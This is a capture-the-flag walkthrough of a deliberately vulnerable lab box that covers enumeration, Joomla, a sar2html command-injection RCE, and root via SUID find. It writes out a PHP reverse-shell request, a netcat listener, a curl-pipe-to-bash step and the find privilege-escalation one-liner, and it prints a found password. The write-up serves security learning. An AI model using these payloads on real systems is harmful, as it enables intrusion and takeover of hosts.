Intermediate level CTF. Just enumerate, you’ll get there. Welp, let’s see if that’s true.


nmap says we’ve got 21 (FTP), 80 (HTTP), 10000 and 55007. Port 10000 is Webmin, and 55007 is SSH. Webmin is a web-based system configuration tool for Unix-like systems. Having SSH running on port 55007 is a timely reminder that just because it usually runs on port 22 doesn’t mean it has to.


The FTP server allows anonymous login, but nothing is obviously present. But checking ls -lash shows there is actually a hidden file. The content is:

Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

This looks like a cipher, so we’ll decode it:

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

In this case the cipher was Rot13, and I’ve been trolled. :/


Visiting the webserver and checking robots.txt reveals several disallowed directories hinting at rabbit holes, and then provides a series of numbers:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Decoding decimal to ASCII gives:
Decoding from base64 gives:
Cracking the hash with john gives:
And again with the trolling. :/


Running a dirbuster on the webservice we can see it’s running Joomla.

At /joomla/_files, we find this:
This is base64, and decodes to
Whopsie daisy.
Yes, trolled again. :/


At /joomla/_test/index.php we find something called sar2html. Running searchsploit shows there is an RCE vulnerability with this, and we can run some commands like this:;whoami

In this way we can cat /etc/passwd, and see there are some users such as stoner and basterd.

We can also list the contents of /var/www/html/joomla, but more usefully we can use Burp repeater and get a reverse shell:

GET /joomla/_test/index.php?plot=;php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%264+>%264+2>%264")%3b' HTTP/1.1

root@kali:/opt/tryhackme/boiler# nc -nvlp 1234
listening on [any] 1234 …
connect to [] from (UNKNOWN) [] 54514
/bin/sh: 0: can’t access tty; job control turned off
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’


Once we’re in, we can get linpeas and pipe it to bash:

www-data@Vulnerable:/dev/shm$ curl | /bin/bash

This tells us that /usr/bin/find is vulnerable. Checking gtfobins we can see what needs to be done:

www-data@Vulnerable:/dev/shm$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit

And with that we can obtain the flags.

Other Users

Doing some more enumeration now we are root, we can see /home/basterd/ which contains credentials for stoner: USER=stoner:#superduperp@$$no1knows

The Shortcut

After I’d completed this, I checked someone else’s writeup and it seems like I was supposed to find a password in a file called log.txt with the sar2html exploit and then SSH in as basterd, then su to stoner, then do the find privesc. Oh well, nothing like taking a shortcut, that’s what hacking is yeah?